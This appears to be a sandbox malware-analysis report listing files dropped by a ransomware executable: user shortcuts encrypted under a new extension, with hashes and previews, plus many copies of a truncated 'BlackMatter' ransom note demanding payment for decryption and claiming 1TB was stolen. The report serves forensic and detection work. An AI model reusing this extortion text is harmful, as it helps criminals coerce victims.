              SHA1:CDD188345A58B5969324774059CB99B5CC39BD25
              SHA-256:0A1DD23F338A5EA8EF8807D46940B4EEEA812E386C68DE181E4A8A30B7C3B442
              SHA-512:63C3699D5593FFFE0407F1A1DCF54FD5C89F84BE899F1C952491FDF70A50E0CAE324B16362D82D04DF191AF980FBEC2B71AFC806B1785C69A8EDF111C8A42370
              Malicious:false
              Preview: . r0.$.mE..$.y..*5..L.a+..R88.4...T....J|..|...U..9H...CI.b.....X.u.d....;....E.....Z..,..h.W.W..Le9z...M>QW.%.'...c...G..iM.@...b-ol&N:{.3...}..v..&.*b..o.>H-.tc.t.f...>>..Ep....4.T...P@..4UJ/.IWd$t.=.uK..AE.k....t...w.sJ.kO.X...m4 ......o......VWJ.b .(.....B1....<.h..su..hjf.."......v.AE...E./.H..|.<...e.9G...k.......<..+..e.D)..K..t}E5c.U.w.....".;u`l..E..H.._.O.~X$.o'%....}ba..o.*k.`V...+...B2..[.u...C....!).!...z^..|......;.....c.v............jH.O<..7T.!...H.o.>.b+v...!..:...7.!....p..x.1v.l1.+..N@.S...I!0..r. d.3..<..n/.{.....ker....7...5.S.......y..6c..S.f_....c.h...(.9gN...Z.@..R..{.O..G.!W..I..TD.....#.a......XG$.H..U.^........m.a..@h&.K....[Q.....}....`\a..R...{.j)...t.Qae.L8...Om 0e8ax^`...t9...F(.:....dK..1g..C..!Z./..^..$..Y.ZV-.$."?.... .r-...S..;..6#p`..?.>.2.-]..R....O.......}.X.{..(.M..<../O.Q..p"....{f(.S..."...<>k=..2u...Y.../.....m...0...P..m6-..=..&.R.?k._..6.Ib..|....U..v.lC...Y..].......]..O.l|L.qb
              C:\Users\user\Downloads\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Favorites\Amazon.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):243
              Entropy (8bit):7.059204015782291
              Encrypted:false
              SSDEEP:6:7OEVmVuyr7rtzge8gyVOEXXEXbI+EXHNChdVysU4VFmuWu:fsL9gEy0EXXEMrNCh6sdmPu
              MD5:ECF4ED5A1D47A534BA114307CBCECB0E
              SHA1:8A4B13542DDF60AB5CC6811BAAB2CBF73DC025A1
              SHA-256:F899AA6121CD4139EF72040C620132445F6B3857FCF4A4EF96BF58439161EC59
              SHA-512:A60092C102059CEBCF1C1FE8F6C5E1939987405C191198C2270C6443A8FBED4EE4CF614882A548F979FA9047C4DC4984472D44F9778DF81993CB20EA0F51BF2D
              Malicious:false
              Preview: ...m..2Ot..}......|....r..m..)..R;.......*(...e.P.#.]d.i......_.....4s......yb......V|..(.T(.....IF2T.l.5..'.r....`....s.:.#5.a0.Os.._.Q..3;.].#..2....\yt.,.&.J......V_.D.e2...t. ..y1.n...o3.$.....g,r...^....4 .1...k.... ....k&j.|K
              C:\Users\user\Favorites\Bing.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):340
              Entropy (8bit):7.305706442132718
              Encrypted:false
              SSDEEP:6:SpDtfQzNntz/3D1v1zPt5eQ+jS/YX/YEcxD5Md3rbspmrCfm4ABYRsyIhBan:09+Nd/3Z5eXjFALxD5Md3omrCfm4AB87
              MD5:3596B1C16E8CA8A9A4982CF06B0A862A
              SHA1:DA60BDDF8AD67C0DAC647ABC611026960D91DBB0
              SHA-256:16E9DBE62D20BD4527E920AD66982BE18C2041DDE37EDA99D3E954F705F46C60
              SHA-512:32B434E34CB6202632E6258B34995BCCA7A0BC88C3CFED977E878B40547077212FD0F6EB5B27D29DAA906E9C1067FB6C3F7E7CE1D86959C804902D5BFFAFDF57
              Malicious:false
              Preview: ....}..)..,7...../s...HY...]Z..A.qP,8eP.*.hZ.?..pZJ...._.e.,U.b.4..Uf...d.*...*(..0 ..?'.......y..3:n..S..w.<.#p...5.:.>.......o.EV3....h.E.H..2,.HS...@....b.(".....-.....6.3Pl.h..V3"Q.fW.....q(./....f..^D".[.rn<..C.<E|.n./.qX.a.%.Sw./..X...59..#.pP...#"M;fs..`%.R...\....BV.{g+..M..q..5....@K.{.J......?`..i..,5... J...
              C:\Users\user\Favorites\Facebook.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):245
              Entropy (8bit):7.174726549205029
              Encrypted:false
              SSDEEP:6:9fuju1C6Dx7vFIPSVYsm5TW30BzkhtQAesS:Yj6R7vF9YsgXKhtjS
              MD5:DE5C016744DB1F34372C8690FB7C1DF7
              SHA1:34F1E407B46F45E770FBF32A26840657FD751B31
              SHA-256:4E82E3B590D0E90361DDF87DC7DFAFBF303D1222ABD0720E87A70B50AE141A8B
              SHA-512:DF517E1C86F7855C1A46B3601A5E4C9EDD5C008E81973F70C78AD10AB15715C73CD27BC6F5EC553C03467B2BF92D88D2457F7B5AD39A5F956515B698F46EDD66
              Malicious:false
              Preview: .i...[.A.d.v......<C..S{..-%AO..H[.....H..m.+._\H..J?n3'_.d.ji\>..:Z9...Q..]...@[`....@... ..5A..-.|^GWY....2...CI..m...Mi..iB..N...l]..(.0..T..%.R`i..s...,..I.6........:....\.].=_..7vPL.W...pa.f...IK.]DK.$..;.%^.5.....;...*....!h./
              C:\Users\user\Favorites\Google.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):243
              Entropy (8bit):7.144204106449179
              Encrypted:false
              SSDEEP:3:WGc/XYAMlvuTtGP27vL9LR89AJYTvvONVj1J0SCv4P2glHtEqSwx27XjkPEaq5Qh:2PnMMtY2j1LYTvvwd1J5o9e2bhsPF
              MD5:4E6DABB3F3F838F63595FCB4BA8FC918
              SHA1:55C50531FED3FDE10E1708E44584AAB7E33B140D
              SHA-256:BE2036B187DD754AFAD6DDDB8D471AA81E9523DBB17B0948B36ECBC6BD430D35
              SHA-512:FB3094CE2E528132407F17D83CBC514E084102F60FBF1A462B4DD456790911BC6E8D2AEC2B5140BDC6908470D579367D448026107934175C2A047BFC43D3A112
              Malicious:false
              Preview: RTu.q.dU..Q...QLE.Mr.?.9...|.K_@...H....K.Z..dI.;...*<....%*J..$..a............(.......f.I...^.5.F......K......h.a_'.&3........mCn.<.{...t.R.....\T..l.a...P.........k.B.v_...%..E.f$.GB...\..".....|.......U'>{...o.tE.L..[...M
              C:\Users\user\Favorites\Links\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Favorites\Live.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):241
              Entropy (8bit):7.108683786320735
              Encrypted:false
              SSDEEP:3:lBTOXcd7yHp4bFHT0jwhLAcxhHrrv//ZaOLyeCvFAeyG+zBDZfF3WjuL3YX3FLLU:lBTOOGa2wZr7pvL8BypzBDZIm3YHNAmE
              MD5:F656EE31DBFB7930A9071BFDEBB39E8F
              SHA1:BEA4C6FBCAD4D90D5F9B736523556339E50B5342
              SHA-256:50CB7B188177EF3B47DF6E7E8DF0B37C0132D43DCA19A0E7CD432A8BDC59A3F0
              SHA-512:2298ED1133B2B6A147025643B464762E3172A446F291CFD839DDD02429A9A4343A2BC0520CA327CA8B69A7EA96E317033BBC83C796BA648CA1476E83A5469C72
              Malicious:false
              Preview: ..I......g..H......}.../.8E.....e.$....YCf5.........V.U.?...|V......g.U........s.T}......i......1s..`...Zw.........&..*b.y...4l.y.........<...n....V[e...R.G..U.../.s.vp.P..?..7.Fu.Th.4C=.F."r.n.5GV .3...m<...A......\2..].u.-
              C:\Users\user\Favorites\NYTimes.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):244
              Entropy (8bit):7.147815950362063
              Encrypted:false
              SSDEEP:6:awdPapI/1F4c2RR9Z9ZtYX3ej5OTCb1TqVAUqaqdrn:TopI/wjTYX3IITO7hdr
              MD5:7C9B0BC6A6E86EC77BCD5B4C1AFF0DB2
              SHA1:24BADAB60EF8AC9FF05EA273B9E30848729BAB1F
              SHA-256:DD8E588BA12F886735C355325CA08226CD559EECE894B402699DB78C93940E6F
              SHA-512:A979E142A8853403BE4D6EB73233EB372A13C9897A5280D6CD0E26B6717C67E992B55C9C855FA5908F5B38A16C5D9D21297354CC8E0D04792646CABA7288A87C
              Malicious:false
              Preview: uj....,D%Hgi...n....e.P.F&.....;..N..V3...Y..%S..L8..H.^Uq...V;.8..0-.3.V..ip$G..+....:U...X....t/....&.y(..4.[.9rcvZ6"LH.>:^.....P#./9.[..4(..z..[\..G.|.*Y.[....@.g.G...".....;..Ke4. .[...l)h.......cn.}.".*...D.p....~.....7.2U.I
              C:\Users\user\Favorites\Reddit.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):243
              Entropy (8bit):7.09372095225515
              Encrypted:false
              SSDEEP:6:C1W0BhKAkGyfXdjrvRA34lUgQw253Pddl7LauhUAYa+f7Pn:0hqdjrvRFCgHQl7LHh9If7P
              MD5:0E74F8542CBFB5E6AD1A1ACA7B37681B
              SHA1:1F4F82B07D86A979BFE736997D7D2245F09A03EE
              SHA-256:4B3EE2D1947C7D2642EB598C72242A01C78A5F57D9E397E1D49A650F74FE80FD
              SHA-512:419FF602029C62756E58EA23EAC98E5F1D5909970F65D9BD34620F553D964B64502A35AE96CAECA9D3C2C1E7035C6DAD1BE318F7E2B76E993556C54D90951F17
              Malicious:false
              Preview: ......6v...G....'.g.LM...s.:Q`.".5..a.^)a.B..AE....:s....... .....:...x..".I*-{.E5`!.P{dM...zt.....V.@,....X.p.....2?J..n6... .2D24.92.%.gmh^.Pb........V.<WDPux@Up........p. #......qM1...Z.....|K.0....z$.0.p..4..&...vj..*... :.=..?
              C:\Users\user\Favorites\Twitter.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):244
              Entropy (8bit):7.044601413292245
              Encrypted:false
              SSDEEP:6:MJeMMHfk+yQKVCnu0d6couA8NGaGOzJB865EHIvE4BAk0Fs:MQM/5onuoKuxR1BxnFB/qs
              MD5:7177B86FEBE70F367F73F8F0A7C1DDC9
              SHA1:0D112F28B511BC3DF9D87003713698374BC29B8D
              SHA-256:5A000B1E44F469A6B59B14201BFDA7F659DCFDD38F4296554BCFC9315133501D
              SHA-512:801B91C1D36DF3DBD24D88457F082566FA6ABAAB7E1FB14B59C23F3632BE319A7BCBC5CDAC103090270BD57DDE7AFAB34A21B89A0C3F7F409C81304C447CDAEE
              Malicious:false
              Preview: i(.!......i.VX.'.V3eg...y..s.LP.'7Jj%u.8.>...f.]Q...R..t....).g.....w.h...gf..?..g...]I:.>''`....X.+...."#*..R....|.|.n......=....W|kXt8f....dR y.fmS.g.U..<..M.m..9.q..{..q=........Y.>.w`..P.c....N.8.O.F..APB}*..^g5...fB.=u...
              C:\Users\user\Favorites\Wikipedia.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):246
              Entropy (8bit):7.135836749196097
              Encrypted:false
              SSDEEP:6:zfueeBTeMBv3N9rhSM1SupmbBufHnbhYPabceO:zfnXAUSnbHnqQjO
              MD5:FEB7F0A9B24D026858050CA14454409D
              SHA1:77A804E2195771F4027C33AA50E3EE12AB20FCA2
              SHA-256:7FC116968E456452A88EE91D5111820A0B8690EE4AB4A6F171E875CC3D567B69
              SHA-512:7103EEC8065FFA143712916028CBDDE456D866D2042FEB3747ECC14972E7E4108534CB029DBCDEFBC281B21F5ECA3A02FD4A10A90B2C0FA1AA40E901EDEBFC86
              Malicious:false
              Preview: .Q.`h^YFO.F....K..hC:r.Ua..b.S....,v;F.^..(....D....i=%..O?H..x.W".I..\... ....WUpO...!B|.j$Is.C.s-h...H...H.v..l..>I.$v..^").....NOzG/~3-(K....:}..AZ.....|.u.t.....7.O.6a...T.?.d......yC....-.5!..1.;.t..[..d..........V;..c...G.&....$
              C:\Users\user\Favorites\Youtube.url.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):244
              Entropy (8bit):7.1322410771662454
              Encrypted:false
              SSDEEP:3:DkNP2p8Bvrg3unEAoZxuV5Hw+/BnMw4+1xN7ANg4cMTaailECe+hZ8qxZzyc+K+T:Atpv3V5Q+pMMNkgk+ptZD+K+3zN7Zzn
              MD5:645653575F66DFE33D2B63D38B740D4C
              SHA1:7992F778A4F1446394F77810B44704D0C0932CCA
              SHA-256:422FD26940430B81DB4894FCACFFE4E38BEE6470A963378910A26D6F7A426281
              SHA-512:0836939E54E4E836D7CED3412AE96C532AB9DB7A3A1D2B1B97B55750DBF966CD1D00127DE1E74046C70382542120D0C91DAA5901DA25E4B85527E9AFD760B897
              Malicious:false
              Preview: ..;^>.u..~t.2.!...[.e.(g1.]&......f..v.K.`90.M3...E.2..........C....+...L.i..]..=..SB".N.....Y...+.5Nv......q..I..j..C........gn....)o..O`.C.F..8.........;..............'.[..^.........9t=/.tg....PWcDv.2....;oV|N.P...9_a(.M..4n..a~=.I...
              C:\Users\user\Favorites\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Links\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Music\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\OneDrive\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Pictures\Camera Roll\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Pictures\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Recent\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Saved Games\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Searches\Everywhere.search-ms.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):380
              Entropy (8bit):7.426949113826943
              Encrypted:false
              SSDEEP:6:WnwcOHmG61/CaU8zWSZtPWTDXNXymJPK2s1H1J6MgELKw8T1eZAGfeoz:WwPHmG61Capz5sC2UHP6JELBQ1SeW
              MD5:D60D1C09C0FBCC8D6443B7C21037758A
              SHA1:4946DD22AD12573BC34220C02BDB10CA9D6E2988
              SHA-256:FC85896B4844A8150BCE4C27677FE8982EC37F40466B58A864AA3E1F8F2032A9
              SHA-512:A75AA70F4D7FC2F1B2695CB1B0D2974888B70AF95B6103C7E97DA5FF7EAFDBFC56C00D7ECE2BC6969BEAB44402BF688BD526771F4ADC5D7C5865BF07112DDEC8
              Malicious:false
              Preview: :.Y.+.....z.....0..;K.._..r....H)..y_.....RP..........`#P.._S.F........./`.........$...9.).=.O"`.....Z$...gB..0..y...)x...J\.+.(t;...m2.".(.|.8s....2=.}.D..N~.....?.F....uf....8pY......]HEF.A....?............U ..m4.....=Y.."..E....V..8.EM..!.......X._O.xj....f....3..C.r.....y......q(P.a._.....W. .~^........./sDR?9..k......lT/.t..2ZGj."[55..8.J.7..G..R....1
              C:\Users\user\Searches\Indexed Locations.search-ms.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):380
              Entropy (8bit):7.467696333446321
              Encrypted:false
              SSDEEP:6:0APHiVsGO6zfZKtWelJUNb/Yvs0VvG2jyzqmGLyhYkub8Fvs1oAz9Pd0SXJG1PdL:0uGpxKZl2Nb8JVvly2PeFcz9P/G1PxX
              MD5:D44B113E91CA20D06900374BBABBB920
              SHA1:CC51190B11EA90A22F8341E18EFE98B0C01808B0
              SHA-256:A29FC9A52B834FABAD9DBF0B703EC521973527600110A36999B730F4B6AF742F
              SHA-512:63F7AA4B793B048831DFD0EC57A8EBFE0490CB917656F2818B35EEC989368138B46AA0BA12EC8F4E49CE22D6203A77E9873F63DA31A106F544C88634FFBEDDC4
              Malicious:false
